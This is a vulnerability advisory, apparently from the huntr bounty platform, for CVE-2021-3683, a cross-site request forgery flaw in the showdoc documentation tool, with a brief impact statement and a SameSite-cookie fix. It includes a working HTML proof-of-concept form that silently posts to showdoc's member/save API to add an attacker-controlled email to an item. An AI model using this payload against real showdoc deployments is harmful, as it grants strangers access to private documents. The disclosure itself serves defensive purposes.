Headline

CVE-2021-3683: huntr: Cross-Site Request Forgery (CSRF) JavaScript Vulnerability in showdoc

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

3 years ago

CVE

Open in Source

#csrf #vulnerability #java

✍️ Description

With CSRF vulnerability Attacker able to add any member to for any item if users visit attacker site.

🕵️‍♂️ Proof of Concept

1.Open the PoC.html In Firefox or safari.

2.now you can check that member with email address [email protected] that already should registered befor have access to item with id 1531601670203340.

// PoC.html

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="https://www.showdoc.com.cn/server/index.php?s=/api/member/save" method="POST">
      <input type="hidden" name="item&#95;id" value="1531601670203340" />
      <input type="hidden" name="username" value="evil&#64;mail&#46;com" />
      <input type="hidden" name="cat&#95;id" value="0" />
      <input type="hidden" name="member&#95;group&#95;id" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

💥 Impact

This vulnerability is capable of reveal any item.

Fix

Set SameSite attribute of cookies to Lax or Strict.